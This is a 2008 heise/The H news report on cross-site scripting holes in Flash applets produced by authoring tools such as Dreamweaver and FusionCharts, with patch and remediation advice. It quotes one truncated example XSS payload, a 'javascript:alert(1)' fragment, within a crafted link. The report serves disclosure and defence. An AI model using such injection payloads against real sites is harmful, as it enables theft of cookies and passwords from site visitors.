In association with heise online

04 January 2008, 13:55

Details of security holes in Flash applets

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

More detailed information is now available about security problems notified at the end of last year, caused by cross-site scripting vulnerabilities in Flash applets. Apparently, errors in common Flash authoring tools can be exploited in order to foist crafted JavaScript code on users and execute it in their browsers. By this means attackers can, for example, read cookies and passwords or carry out operations in the context of a site that has been called up, e.g. by putting entries in blogs or making comments.

It is reported that the tools involved include Adobe Dreamweaver, Adobe Acrobat Connect, formerly Macromedia Breeze, InfoSoft FusionCharts and Techsmith Camtasia. The SWF files generated by these tools are said to be on a great many Web sites. At a guess, several hundred thousand Flash applets could have this problem, a not insignificant percentage of them being large and popular – among them government and online banking Web sites.

The problem is not limited to the tools listed, however: according to the report, these are only the products in which the error has already been corrected by their manufacturers with an update. Also said to be affected are service providers, such as Autodemo, that develop Flash applications for clients and are obviously using a vulnerable tool for the purpose.

The real problem, says the report, is due to the embedding of defective ActionScript code in SWF files, by means of which certain functions can be controlled. This code, which is always the same, is inserted into an SWF file every time it is stored or exported. The ActionScript code can be misused in order to execute a JavaScript that has been passed as an argument in the security context of the site visited, although the JavaScript code did not originate from there at all but from the site of an attacker. For this to happen, however, it is necessary to click a crafted link. A link to exploit an XSS vulnerability in Dreamweaver, for example, looks like this:,javascript:alert(1)//

An error in InfoSoft's FusionCharts even enabled further SWF files to be loaded from other domains over the following link.

The updated version of Adobe Flash Player that appeared in December prevents attackers being able to exploit the error via the asfunction protocol handler - at least in the case of Adobe products. The author of the vulnerability report recommends Webmasters to remove the vulnerable Flash applets from their sites and recreate them from scratch with corrected versions of their authoring tools. The user-defined variables passed to ActionScript with all URL functions should moreover be given a more detailed check. Developers can also test the security of their Flash applications with the tool SWFIntruder .

See also:


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit